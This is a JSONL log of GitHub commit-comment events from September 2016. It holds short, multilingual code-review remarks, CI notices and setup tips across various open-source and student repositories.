{"id":"4544003105","type":"CommitCommentEvent","actor":{"login":"zebastian"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":18973543,"position":null,"line":null,"path":null,"commit_id":"090176fb96a3bf43b0c6963ccd1ebf6353d8ab79","created_at":"2016-09-10T12:49:06Z","updated_at":"2016-09-10T12:49:06Z","body":"@buddhi1980 \r\nin my fedora desktop it was quite good hidden. I had to:\r\n- hover over the bottom left of the screen -> arrow appeared\r\n- click on the arrow -> tray bar appeared\r\n- right click on mandelbulber icon -> context menu with actions appeared\r\n\r\nSo you could try to find something in the corners of your screen. Or try to google for your specific window manager how to find it (or activate it, if not active).\r\n![01- bottom left corner - default](https://cloud.githubusercontent.com/assets/7888201/18410499/1780a878-7765-11e6-91c1-a4d3bbe85c0e.png)\r\n![02- bottom left corner - on hover](https://cloud.githubusercontent.com/assets/7888201/18410501/1782a54c-7765-11e6-8c68-d4e9f3d15ac3.png)\r\n![03- bottom left corner - on click arrow](https://cloud.githubusercontent.com/assets/7888201/18410500/17821e42-7765-11e6-9ae4-6eebbb5e42d7.png)\r\n![04- bottom left corner - on right click icon](https://cloud.githubusercontent.com/assets/7888201/18410502/1785608e-7765-11e6-9a89-d22ffa676716.png)\r\n\r\n@mclarekin yes, its the little mandelbulbs :)\r\nyou can right click on the icon to have a small amount of actions to \"remote control\" the application.\r\nIt can also be used to show small notifications (animation render finished, ...)"}},"created_at":"2016-09-10T12:49:06Z"}
{"id":"4544003552","type":"CommitCommentEvent","actor":{"login":"c00ni"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18973544,"position":null,"line":null,"path":null,"commit_id":"d3be5240e0795b12b447138d22639cb45251c3e2","created_at":"2016-09-10T12:49:26Z","updated_at":"2016-09-10T12:49:26Z","body":"Haha yep, that's the place. Really doesn't seem to be much around in the suburbs... or maybe we just live in ignorance haha.\r\nMaybe you had a lot more location fails than I did because the unicode stuff. I just had a normal run of the mill location failure here."}},"created_at":"2016-09-10T12:49:26Z"}
{"id":"4544003772","type":"CommitCommentEvent","actor":{"login":"ShevT"},"repo":{"name":"sigma-1/android_hardware_samsung_slsi-cm_exynos5420"},"payload":{"comment":{"id":18973545,"position":null,"line":null,"path":null,"commit_id":"d077adc85d8e4503167b61a04276c51ce4a03f72","created_at":"2016-09-10T12:49:36Z","updated_at":"2016-09-10T12:49:36Z","body":"It is not right.\r\nYou just have to add\r\nheader-y += s3c-fb.h\r\nin https://github.com/sigma-1/android_kernel_samsung_n1awifi/blob/cm-13.0/include/linux/Kbuild"}},"created_at":"2016-09-10T12:49:36Z"}
{"id":"4544003853","type":"CommitCommentEvent","actor":{"login":"polesye"},"repo":{"name":"stergen/js_market"},"payload":{"comment":{"id":18973546,"position":144,"line":116,"path":"js/product.js","commit_id":"312457e40ca4dcf3cccce9734f581fe189d75eab","created_at":"2016-09-10T12:49:40Z","updated_at":"2016-09-10T12:49:40Z","body":"getTotal"}},"created_at":"2016-09-10T12:49:40Z"}
{"id":"4544003899","type":"CommitCommentEvent","actor":{"login":"ShadowDragonX"},"repo":{"name":"casillaskhoren1/Streamable-Anime-List"},"payload":{"comment":{"id":18973547,"position":null,"line":null,"path":null,"commit_id":"e967fc5c801ca5888529116e0177bfae06b2098c","created_at":"2016-09-10T12:49:43Z","updated_at":"2016-09-10T12:49:43Z","body":"-Blood-C\r\n-Devil Survivor 2 The Animation"}},"created_at":"2016-09-10T12:49:43Z"}
{"id":"4544003967","type":"CommitCommentEvent","actor":{"login":"misaochan"},"repo":{"name":"commons-app/apps-android-commons"},"payload":{"comment":{"id":18973548,"position":null,"line":null,"path":null,"commit_id":"1d55c6f2b5e692ed541b37ec6b0bab9ea4f710fa","created_at":"2016-09-10T12:49:46Z","updated_at":"2016-09-10T12:49:46Z","body":"Huh. I wonder why this messed up the Travis CI build, it should be a straightforward change?"}},"created_at":"2016-09-10T12:49:46Z"}
{"id":"4544004075","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"schonmann/EDL"},"payload":{"comment":{"id":18973549,"position":null,"line":null,"path":null,"commit_id":"588cab99cb340970e528b4c373457eda48893c05","created_at":"2016-09-10T12:49:52Z","updated_at":"2016-09-10T12:49:52Z","body":"Eu te entendo, mas não exagere..."}},"created_at":"2016-09-10T12:49:52Z"}
{"id":"4544004254","type":"CommitCommentEvent","actor":{"login":"burukinsd"},"repo":{"name":"absurdean/.net_ex1"},"payload":{"comment":{"id":18973550,"position":12,"line":12,"path":"chocolate2/chocolate2/Program.cs","commit_id":"48ca829ba2b8ce24794d36af76297988ca1ce092","created_at":"2016-09-10T12:49:59Z","updated_at":"2016-09-10T12:49:59Z","body":"Лучше впихнуть сплит в первую строчку, чтобы 2 раза его не дергать"}},"created_at":"2016-09-10T12:49:59Z"}
{"id":"4544004717","type":"CommitCommentEvent","actor":{"login":"polesye"},"repo":{"name":"stergen/js_market"},"payload":{"comment":{"id":18973552,"position":76,"line":54,"path":"js/product.js","commit_id":"312457e40ca4dcf3cccce9734f581fe189d75eab","created_at":"2016-09-10T12:50:18Z","updated_at":"2016-09-10T12:50:18Z","body":"I'd prefet to see it as a class property. For example `this.template`"}},"created_at":"2016-09-10T12:50:18Z"}
{"id":"4544007639","type":"CommitCommentEvent","actor":{"login":"polesye"},"repo":{"name":"stergen/js_market"},"payload":{"comment":{"id":18973554,"position":85,"line":63,"path":"js/product.js","commit_id":"312457e40ca4dcf3cccce9734f581fe189d75eab","created_at":"2016-09-10T12:52:46Z","updated_at":"2016-09-10T12:52:46Z","body":"look at Regular expressions flag`g` and remove `while` above."}},"created_at":"2016-09-10T12:52:46Z"}
{"id":"4544007644","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18973553,"position":null,"line":null,"path":null,"commit_id":"cc0b4f4b64247028fb7aac857f344e0bda8f2a8f","created_at":"2016-09-10T12:52:46Z","updated_at":"2016-09-10T12:52:46Z","body":"Why not apply that in _RequestHandler.java_ and _HTTPServer.java_ as well ?\r\n\r\nAfter that it'll not necessary to keep this class in _PmsConfiguration.java_ anymore ?"}},"created_at":"2016-09-10T12:52:46Z"}
{"id":"4544007910","type":"CommitCommentEvent","actor":{"login":"axypas"},"repo":{"name":"axypas/clippy.js"},"payload":{"comment":{"id":18973555,"position":null,"line":null,"path":null,"commit_id":"54227a27b49e364a24af858e3ed8dce162554d3c","created_at":"2016-09-10T12:53:03Z","updated_at":"2016-09-10T12:53:03Z","body":"You are right, this commit makes no sense.\r\n"}},"created_at":"2016-09-10T12:53:03Z"}
{"id":"4544008300","type":"CommitCommentEvent","actor":{"login":"lilydjwg"},"repo":{"name":"archlinuxcn/repo"},"payload":{"comment":{"id":18973556,"position":null,"line":null,"path":null,"commit_id":"aa2a49ada31574ee46c53b4fec6f6cba70aaa6ec","created_at":"2016-09-10T12:53:22Z","updated_at":"2016-09-10T12:53:22Z","body":"@lastavenger 因为报错邮件被 MS 拒收了。我转一份给你试试。"}},"created_at":"2016-09-10T12:53:22Z"}
{"id":"4544008330","type":"CommitCommentEvent","actor":{"login":"yuyichao"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18973557,"position":null,"line":null,"path":null,"commit_id":"843e0fea2549add6a7d1d6c752c5906691d601d6","created_at":"2016-09-10T12:53:23Z","updated_at":"2016-09-10T12:53:23Z","body":"Not new either. It's shown in https://github.com/JuliaCI/BaseBenchmarkReports/blob/d7c7c268c3d69204a543df96363f63c733687c0b/daily_2016_9_8/report.md from https://github.com/JuliaLang/julia/commit/fd679b95d07cc68aa68b57b3de1ff0f40f24977c 2 days ago. It was the first daily report after the Nanosoldier took it's two days off with a few related commits in that period."}},"created_at":"2016-09-10T12:53:23Z"}
{"id":"4544010826","type":"CommitCommentEvent","actor":{"login":"XhmikosR"},"repo":{"name":"appveyor/website"},"payload":{"comment":{"id":18973559,"position":null,"line":null,"path":null,"commit_id":"bc6a4863331d5b89bed82f13a192479519747891","created_at":"2016-09-10T12:55:34Z","updated_at":"2016-09-10T12:55:34Z","body":"@FeodorFitsner: you should update the installed software too."}},"created_at":"2016-09-10T12:55:34Z"}
{"id":"4544011404","type":"CommitCommentEvent","actor":{"login":"polesye"},"repo":{"name":"stergen/js_market"},"payload":{"comment":{"id":18973560,"position":88,"line":65,"path":"js/product.js","commit_id":"312457e40ca4dcf3cccce9734f581fe189d75eab","created_at":"2016-09-10T12:56:04Z","updated_at":"2016-09-10T12:56:04Z","body":"```js\r\n    productBlock = productBlock.replace(/%\\((.+?)\\)/g, function(expr, paramName) {\r\n        if (paramName in objectProduct) return objectProduct[paramName];\r\n        return expr;\r\n    });\r\n```"}},"created_at":"2016-09-10T12:56:04Z"}
{"id":"4544012465","type":"CommitCommentEvent","actor":{"login":"lastavenger"},"repo":{"name":"archlinuxcn/repo"},"payload":{"comment":{"id":18973561,"position":null,"line":null,"path":null,"commit_id":"aa2a49ada31574ee46c53b4fec6f6cba70aaa6ec","created_at":"2016-09-10T12:56:58Z","updated_at":"2016-09-10T12:56:58Z","body":"麻烦百合了~ ~~垃圾M$~~"}},"created_at":"2016-09-10T12:56:58Z"}
{"id":"4544012971","type":"CommitCommentEvent","actor":{"login":"polesye"},"repo":{"name":"stergen/js_market"},"payload":{"comment":{"id":18973562,"position":88,"line":65,"path":"js/product.js","commit_id":"312457e40ca4dcf3cccce9734f581fe189d75eab","created_at":"2016-09-10T12:57:22Z","updated_at":"2016-09-10T12:57:22Z","body":"http://bonsaiden.github.io/JavaScript-Garden/ru/"}},"created_at":"2016-09-10T12:57:22Z"}
{"id":"4544015269","type":"CommitCommentEvent","actor":{"login":"hodoogwaja"},"repo":{"name":"sarojaba/awesome-devblog"},"payload":{"comment":{"id":18973566,"position":null,"line":null,"path":null,"commit_id":"a19a400f355c573a779fbd5682ea427b20cee7a4","created_at":"2016-09-10T12:59:17Z","updated_at":"2016-09-10T12:59:17Z","body":"add blog of 김정환"}},"created_at":"2016-09-10T12:59:17Z"}
{"id":"4544015355","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":18973567,"position":null,"line":null,"path":null,"commit_id":"7ed359cb14836abd241ca1c2a3b40376be1c9a87","created_at":"2016-09-10T12:59:22Z","updated_at":"2016-09-10T12:59:22Z","body":"Love the table lookup in `negated_relation`!  It's the perfect way to do language-based dispatch when the language is a pure AST and you can dispatch on the non-terminals."}},"created_at":"2016-09-10T12:59:22Z"}
{"id":"4544016991","type":"CommitCommentEvent","actor":{"login":"unknownbrackets"},"repo":{"name":"hrydgard/ppsspp"},"payload":{"comment":{"id":18973570,"position":null,"line":null,"path":null,"commit_id":"de1643997f3a6d2cad22882726d8a67f08eb761e","created_at":"2016-09-10T13:00:30Z","updated_at":"2016-09-10T13:00:30Z","body":"I am still very strongly against this change.\r\n\r\n-[Unknown]"}},"created_at":"2016-09-10T13:00:30Z"}
{"id":"4544017400","type":"CommitCommentEvent","actor":{"login":"polesye"},"repo":{"name":"stergen/js_market"},"payload":{"comment":{"id":18973572,"position":118,"line":90,"path":"js/product.js","commit_id":"312457e40ca4dcf3cccce9734f581fe189d75eab","created_at":"2016-09-10T13:00:47Z","updated_at":"2016-09-10T13:00:47Z","body":"please look at event loop. http://learn.javascript.ru/event-bubbling"}},"created_at":"2016-09-10T13:00:47Z"}
{"id":"4544017462","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":18973573,"position":null,"line":null,"path":null,"commit_id":"c6cf109ef9fabfc88cd363869c6f5a936524d90d","created_at":"2016-09-10T13:00:50Z","updated_at":"2016-09-10T13:00:50Z","body":"I don't understand the use of %piecewise here (line 414 of Hakaru.mpl)."}},"created_at":"2016-09-10T13:00:50Z"}
{"id":"4544017598","type":"CommitCommentEvent","actor":{"login":"osslab"},"repo":{"name":"osslab/scrapybot"},"payload":{"comment":{"id":18973574,"position":null,"line":null,"path":null,"commit_id":"f01a9648150f2cecae1947d37252383f10ff3798","created_at":"2016-09-10T13:00:56Z","updated_at":"2016-09-10T13:00:56Z","body":"Unify README.md"}},"created_at":"2016-09-10T13:00:56Z"}
{"id":"4544018148","type":"CommitCommentEvent","actor":{"login":"unknownbrackets"},"repo":{"name":"hrydgard/ppsspp"},"payload":{"comment":{"id":18973575,"position":null,"line":null,"path":null,"commit_id":"de1643997f3a6d2cad22882726d8a67f08eb761e","created_at":"2016-09-10T13:01:19Z","updated_at":"2016-09-10T13:01:19Z","body":"https://github.com/hrydgard/ppsspp/commit/38263c907367a7622aa012ce06c5f61f6d13e240\r\n\r\n-[Unknown]"}},"created_at":"2016-09-10T13:01:19Z"}
{"id":"4544018908","type":"CommitCommentEvent","actor":{"login":"rubysoho07"},"repo":{"name":"rubysoho07/MusicManager"},"payload":{"comment":{"id":18973576,"position":null,"line":null,"path":null,"commit_id":"c67cbd6437bf51ae1bafe2b30c0696fba2a68913","created_at":"2016-09-10T13:01:56Z","updated_at":"2016-09-10T13:01:56Z","body":"If you want to install packages from this file with pip, execute \"sudo pip install -r requirement.txt\"."}},"created_at":"2016-09-10T13:01:56Z"}
{"id":"4544020570","type":"CommitCommentEvent","actor":{"login":"polesye"},"repo":{"name":"stergen/js_market"},"payload":{"comment":{"id":18973577,"position":1,"line":1,"path":"js/product.js","commit_id":"312457e40ca4dcf3cccce9734f581fe189d75eab","created_at":"2016-09-10T13:03:14Z","updated_at":"2016-09-10T13:03:14Z","body":"Please add checkout popup, remove item logic, read about publicher/subscriber design pattern."}},"created_at":"2016-09-10T13:03:14Z"}
{"id":"4544021484","type":"CommitCommentEvent","actor":{"login":"Zimelor"},"repo":{"name":"Zimelor/UN-Hold-em"},"payload":{"comment":{"id":18973578,"position":null,"line":null,"path":null,"commit_id":"f3c99406501718717409f29afb4202cf539fb83e","created_at":"2016-09-10T13:03:46Z","updated_at":"2016-09-10T13:03:46Z","body":"Added javadocs and deleted license headers"}},"created_at":"2016-09-10T13:03:46Z"}
{"id":"4544022448","type":"CommitCommentEvent","actor":{"login":"bibekmakaju"},"repo":{"name":"bibekmakaju/bibek"},"payload":{"comment":{"id":18973579,"position":null,"line":null,"path":null,"commit_id":"3d8fd75461091ce1632e99635811f87fc2d9bd61","created_at":"2016-09-10T13:04:31Z","updated_at":"2016-09-10T13:04:31Z","body":"Only the begineers"}},"created_at":"2016-09-10T13:04:31Z"}
{"id":"4544023262","type":"CommitCommentEvent","actor":{"login":"dev-harsh1998"},"repo":{"name":"Silentlys/android_kernel_lenovo_msm8916"},"payload":{"comment":{"id":18973580,"position":null,"line":null,"path":null,"commit_id":"e877bc9c7dae34d5f39f8d5dc1b8bcda510255e3","created_at":"2016-09-10T13:05:10Z","updated_at":"2016-09-10T13:05:10Z","body":"yes it is but wt86518 has to variants 1gb ram and 2 gb ram in 1gb ram variant the 64bit rom lags even after badass kernel optimisations btw if you have 32bit/64bit tree ready kindly link me asap @TingyiChen "}},"created_at":"2016-09-10T13:05:10Z"}
{"id":"4544024260","type":"CommitCommentEvent","actor":{"login":"atarijeff"},"repo":{"name":"google/sagetv"},"payload":{"comment":{"id":18973583,"position":null,"line":null,"path":null,"commit_id":"a75c8bdfb0726c7a09406dbf14803e5aa47a9c02","created_at":"2016-09-10T13:05:57Z","updated_at":"2016-09-10T13:05:57Z","body":"The purpose was to create a filename that represented as close as possible the 'real' name of the program being recorded. There is a list of characters not allowed to be used as they are typically not allowed by file systems. I will also cc this response to the forum thread mentioned above."}},"created_at":"2016-09-10T13:05:57Z"}
{"id":"4544025322","type":"CommitCommentEvent","actor":{"login":"reaver-project-ci"},"repo":{"name":"reaver-project/reaverlib"},"payload":{"comment":{"id":18973587,"position":null,"line":null,"path":null,"commit_id":"033b76da78ad21b8ea40446420c292c209ff8560","created_at":"2016-09-10T13:06:46Z","updated_at":"2016-09-10T13:06:46Z","body":"CI job has failed for environment `gcc:5_3_0/boost:1.60.0`: https://ci.reaver-project.org/viewLog.html?buildId=3546&buildTypeId=reaverlib_Tests&guest=1."}},"created_at":"2016-09-10T13:06:46Z"}
{"id":"4544026181","type":"CommitCommentEvent","actor":{"login":"otofune"},"repo":{"name":"syuilo/misskey-web"},"payload":{"comment":{"id":18973589,"position":null,"line":null,"path":null,"commit_id":"b1d3f9c4925e176d62f2b97f299e6f076088ac31","created_at":"2016-09-10T13:07:28Z","updated_at":"2016-09-10T13:07:28Z","body":"```\r\nhttps:\r\n   enable: true,\r\n   useCert: false,\r\n...\r\n```\r\nみたいにするのはどうでしょ"}},"created_at":"2016-09-10T13:07:28Z"}
{"id":"4544033224","type":"CommitCommentEvent","actor":{"login":"BetoBarros07"},"repo":{"name":"BetoBarros07/ToDoList-Senai"},"payload":{"comment":{"id":18973598,"position":null,"line":null,"path":null,"commit_id":"986cdcc510419af7fbade9d305b58b82c7a6c6ba","created_at":"2016-09-10T13:12:48Z","updated_at":"2016-09-10T13:12:48Z","body":"Você fez bosta!"}},"created_at":"2016-09-10T13:12:48Z"}
{"id":"4544033591","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"selivanov-d/train_manager"},"payload":{"comment":{"id":18973599,"position":3,"line":2,"path":"app/models/railway_station.rb","commit_id":"795290134b172d9d5949fd1a2ec89e127e40bc11","created_at":"2016-09-10T13:13:06Z","updated_at":"2016-09-10T13:13:06Z","body":"👍 "}},"created_at":"2016-09-10T13:13:06Z"}
{"id":"4544034572","type":"CommitCommentEvent","actor":{"login":"felipereis12"},"repo":{"name":"felipereis12/Todo-list-de-repositorio-do-github"},"payload":{"comment":{"id":18973602,"position":null,"line":null,"path":null,"commit_id":"58d421fcc9948c22333ea7125241809a23dd6fea","created_at":"2016-09-10T13:13:49Z","updated_at":"2016-09-10T13:13:49Z","body":"Bela alteração"}},"created_at":"2016-09-10T13:13:49Z"}
{"id":"4544036593","type":"CommitCommentEvent","actor":{"login":"seikur0"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18973605,"position":null,"line":null,"path":null,"commit_id":"d3be5240e0795b12b447138d22639cb45251c3e2","created_at":"2016-09-10T13:15:20Z","updated_at":"2016-09-10T13:15:20Z","body":"Yeah I had like 10% or so successful locations, so I thought it would be the same for everybody. That's why a general try statement without printing the error is a bad idea :D Wasn't me, who put that in, haha. And hey I also dug through some python modules and find the setting, that I need to overwrite for it to show port bind errors, it'll now do that. The comment beside it says: \"# Seems to make sense in testing environment\" No words...."}},"created_at":"2016-09-10T13:15:20Z"}
{"id":"4544036873","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"selivanov-d/train_manager"},"payload":{"comment":{"id":18973606,"position":4,"line":4,"path":"db/migrate/20160908180036_create_railway_stations_routes.rb","commit_id":"379e875263bdaab53eba6d5fb5f802732c4adaf3","created_at":"2016-09-10T13:15:32Z","updated_at":"2016-09-10T13:15:32Z","body":"Да, на практике очень хорошо если уделяется достаточное внимание моделированию и ограничениям схемы базы данных. Иначе могут возникать побочные эффекты и ошибки которые трудно отследить и исправить.\r\n\r\nЧто интересно, опция `index: true` работает только внутри метода `create_table`, то есть при добавлении колонки нужно индекс добавлять вручную."}},"created_at":"2016-09-10T13:15:32Z"}
{"id":"4544037175","type":"CommitCommentEvent","actor":{"login":"atamariya"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18973607,"position":null,"line":null,"path":null,"commit_id":"cc0b4f4b64247028fb7aac857f344e0bda8f2a8f","created_at":"2016-09-10T13:15:45Z","updated_at":"2016-09-10T13:15:45Z","body":"Those are V1 classes - it's better to just drop them!!"}},"created_at":"2016-09-10T13:15:45Z"}
{"id":"4544040736","type":"CommitCommentEvent","actor":{"login":"c00ni"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18973612,"position":null,"line":null,"path":null,"commit_id":"d3be5240e0795b12b447138d22639cb45251c3e2","created_at":"2016-09-10T13:18:24Z","updated_at":"2016-09-10T13:18:24Z","body":"Sounds legit haha"}},"created_at":"2016-09-10T13:18:24Z"}
{"id":"4544041305","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"antonefremov/ror-basics-course"},"payload":{"comment":{"id":18973616,"position":21,"line":21,"path":"Lesson_5/train.rb","commit_id":"7822ef02e4923559ad55c29e6ec0251cc378c68c","created_at":"2016-09-10T13:18:51Z","updated_at":"2016-09-10T13:18:51Z","body":"Я ещё не смотрел код, но, по-моему, не должно быть проблем с созданием поездов с одинаковым номером, но разными типами."}},"created_at":"2016-09-10T13:18:51Z"}
{"id":"4544042300","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":18973617,"position":null,"line":null,"path":null,"commit_id":"c34ff5e132e1a75f4de1fa277cb523739a39c08c","created_at":"2016-09-10T13:19:33Z","updated_at":"2016-09-10T13:19:33Z","body":"An absolute pin is a pin on the king where moving the pinned piece would result in an illegal move. This stands in contrasts to relative pins where moving the piece is legal but loosing. More will follow when I find a little bit more time ..."}},"created_at":"2016-09-10T13:19:33Z"}
{"id":"4544043499","type":"CommitCommentEvent","actor":{"login":"mapfau"},"repo":{"name":"mapfau/inputstream.mpd"},"payload":{"comment":{"id":18973618,"position":36,"line":960,"path":"src/MainDash.cpp","commit_id":"90912caf9b0a4b99be8768b58407a388f1f47495","created_at":"2016-09-10T13:20:29Z","updated_at":"2016-09-10T13:20:29Z","body":"Will change it monday. Business travel over the weekend"}},"created_at":"2016-09-10T13:20:29Z"}
{"id":"4544047801","type":"CommitCommentEvent","actor":{"login":"TheDoct0r11"},"repo":{"name":"sant0ro/Yupi"},"payload":{"comment":{"id":18973632,"position":null,"line":null,"path":null,"commit_id":"89b52ebe1d6bcaf9afe0ea4cfe4162abf96ef71a","created_at":"2016-09-10T13:23:45Z","updated_at":"2016-09-10T13:23:45Z","body":"Thanks!\r\nBut the ChatEmotions were simply copy pasted from the old source."}},"created_at":"2016-09-10T13:23:45Z"}
{"id":"4544048676","type":"CommitCommentEvent","actor":{"login":"felipereis12"},"repo":{"name":"moises2112/TESTE"},"payload":{"comment":{"id":18973633,"position":null,"line":null,"path":null,"commit_id":"e23aef0b07870ad8710632874ff33c2c7dcddfa4","created_at":"2016-09-10T13:24:28Z","updated_at":"2016-09-10T13:24:28Z","body":"Salve\r\n"}},"created_at":"2016-09-10T13:24:28Z"}
{"id":"4544049151","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"antonefremov/ror-basics-course"},"payload":{"comment":{"id":18973634,"position":25,"line":17,"path":"Lesson_5/train.rb","commit_id":"9d1dfff2ce974d7f76de31cae539a9a79487b06c","created_at":"2016-09-10T13:24:50Z","updated_at":"2016-09-10T13:24:50Z","body":"Тут вся фишка в том чтобы либо использовать *инстанс переменную уровня класса*, либо использовать переменную класса, но хранить в ней структуру данных иначе, чтобы номера не пересекались. Например, это может быть не хэш, а массив.\r\n\r\nВариант с инстанс переменной уровня класса много лучше."}},"created_at":"2016-09-10T13:24:50Z"}
{"id":"4544049572","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"antonefremov/ror-basics-course"},"payload":{"comment":{"id":18973635,"position":4,"line":4,"path":"Lesson_5/producer.rb","commit_id":"7822ef02e4923559ad55c29e6ec0251cc378c68c","created_at":"2016-09-10T13:25:09Z","updated_at":"2016-09-10T13:25:09Z","body":"В самый раз )"}},"created_at":"2016-09-10T13:25:09Z"}
{"id":"4544049854","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18973636,"position":null,"line":null,"path":null,"commit_id":"cc0b4f4b64247028fb7aac857f344e0bda8f2a8f","created_at":"2016-09-10T13:25:22Z","updated_at":"2016-09-10T13:25:22Z","body":"I've never understood what's better with netty/V2. I generally have much fewer bugs when using V1. What's the benefit of netty?"}},"created_at":"2016-09-10T13:25:22Z"}
{"id":"4544050163","type":"CommitCommentEvent","actor":{"login":"fee1good"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18973638,"position":19,"line":56,"path":"lesson_3/disp_app.rb","commit_id":"dfb05d56141b89297aec5c2fec4538f95511dd7f","created_at":"2016-09-10T13:25:36Z","updated_at":"2016-09-10T13:25:36Z","body":"В методе добавления поезда создать переменную `@current_station`, куда записываю текущую станцию (`self.Station`), ожидаю, при вызове `@current_station`, будет отображаться текущая станция. Но этого не происходит, возвращает `nil`.\r\n\r\nРеализация @current_station тут - https://github.com/fee1good/thinknetica_ror_beginer/commit/dfb05d56141b89297aec5c2fec4538f95511dd7f#diff-62ccf5a7d8c6a3ee0b6dc183c3bf9baeL76"}},"created_at":"2016-09-10T13:25:36Z"}
{"id":"4544050337","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"antonefremov/ror-basics-course"},"payload":{"comment":{"id":18973640,"position":21,"line":21,"path":"Lesson_5/train.rb","commit_id":"7822ef02e4923559ad55c29e6ec0251cc378c68c","created_at":"2016-09-10T13:25:44Z","updated_at":"2016-09-10T13:25:44Z","body":"Посмотрел, откоментил: https://github.com/antonefremov/ror-basics-course/commit/9d1dfff2ce974d7f76de31cae539a9a79487b06c#commitcomment-18973634"}},"created_at":"2016-09-10T13:25:44Z"}
{"id":"4544051506","type":"CommitCommentEvent","actor":{"login":"wibs"},"repo":{"name":"metova/DataManager"},"payload":{"comment":{"id":18973641,"position":76,"line":134,"path":"Sources/DataManager.swift","commit_id":"efc9cfe4cc0f7ef4a954d052936e090ddd0d40e6","created_at":"2016-09-10T13:26:34Z","updated_at":"2016-09-10T13:26:34Z","body":"I think I prefer  setUp(withDataModelName dataModelName:"}},"created_at":"2016-09-10T13:26:34Z"}
{"id":"4544051832","type":"CommitCommentEvent","actor":{"login":"DREAMWORLDVOID"},"repo":{"name":"Infinideastudio/Infinideastudio-Frameworks"},"payload":{"comment":{"id":18973642,"position":7,"line":6,"path":"README.md","commit_id":"698e9d192fde627eafb7fde8363863efb369c8f2","created_at":"2016-09-10T13:26:49Z","updated_at":"2016-09-10T13:26:49Z","body":"这个还是前个月写的文档。。。过两天重新搞一个"}},"created_at":"2016-09-10T13:26:49Z"}
{"id":"4544053913","type":"CommitCommentEvent","actor":{"login":"DREAMWORLDVOID"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18973647,"position":18,"line":52,"path":"src/server/server.h","commit_id":"8de0766bfcbcab5862b4d32bdf245275169bc0aa","created_at":"2016-09-10T13:28:23Z","updated_at":"2016-09-10T13:28:23Z","body":"@abc612008 检测可以一定程度上减少。"}},"created_at":"2016-09-10T13:28:23Z"}
{"id":"4544056122","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"antonefremov/ror-basics-course"},"payload":{"comment":{"id":18973651,"position":3,"line":3,"path":"Lesson_5/instance_counter.rb","commit_id":"9d1dfff2ce974d7f76de31cae539a9a79487b06c","created_at":"2016-09-10T13:30:05Z","updated_at":"2016-09-10T13:30:05Z","body":"Момент один: здесь метод `self.instances` будет доступен **только** для модуля `InstanceCounter`."}},"created_at":"2016-09-10T13:30:05Z"}
{"id":"4544057389","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"antonefremov/ror-basics-course"},"payload":{"comment":{"id":18973653,"position":9,"line":9,"path":"Lesson_5/instance_counter.rb","commit_id":"9d1dfff2ce974d7f76de31cae539a9a79487b06c","created_at":"2016-09-10T13:30:55Z","updated_at":"2016-09-10T13:30:55Z","body":"Момент два: переменная будет считать количество объектов вообще всех классов (то есть каждый раз когда вызывается `register_instance` и не важно из какого класса."}},"created_at":"2016-09-10T13:30:55Z"}
{"id":"4544057790","type":"CommitCommentEvent","actor":{"login":"golddranks"},"repo":{"name":"himotimo/BITZ"},"payload":{"comment":{"id":18973654,"position":null,"line":null,"path":null,"commit_id":"93309416730c9eb14fe13f5757ba83d7c47b18dc","created_at":"2016-09-10T13:31:13Z","updated_at":"2016-09-10T13:31:13Z","body":"Hyvä Timo! Kaikki kannustavat! 頑張れ頑張れて～も！"}},"created_at":"2016-09-10T13:31:13Z"}
{"id":"4544058308","type":"CommitCommentEvent","actor":{"login":"yinqiwen"},"repo":{"name":"yinqiwen/gsnova"},"payload":{"comment":{"id":18973655,"position":null,"line":null,"path":null,"commit_id":"54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361","created_at":"2016-09-10T13:31:37Z","updated_at":"2016-09-10T13:31:37Z","body":"1. git clone -b master https://github.com/yinqiwen/gsnova/ $GOPATH/src/github.com/yinqiwen/gsnova\r\n2. cd  $GOPATH/src/github.com/yinqiwen/gsnova/remote/gae    \r\n3. appcfg.py -A <appid> -V 1  update ./"}},"created_at":"2016-09-10T13:31:37Z"}
{"id":"4544059758","type":"CommitCommentEvent","actor":{"login":"moises2112"},"repo":{"name":"felipereis12/Todo-list-de-repositorio-do-github"},"payload":{"comment":{"id":18973662,"position":null,"line":null,"path":null,"commit_id":"6ad20300ae50ed3449f939a765c093ebc879a805","created_at":"2016-09-10T13:32:44Z","updated_at":"2016-09-10T13:32:44Z","body":"teste\r\n"}},"created_at":"2016-09-10T13:32:44Z"}
{"id":"4544059936","type":"CommitCommentEvent","actor":{"login":"syuilo"},"repo":{"name":"syuilo/misskey-web"},"payload":{"comment":{"id":18973663,"position":null,"line":null,"path":null,"commit_id":"b1d3f9c4925e176d62f2b97f299e6f076088ac31","created_at":"2016-09-10T13:32:52Z","updated_at":"2016-09-10T13:32:52Z","body":"証明書なしでHTTPS化することはできないので誤解を招く"}},"created_at":"2016-09-10T13:32:52Z"}
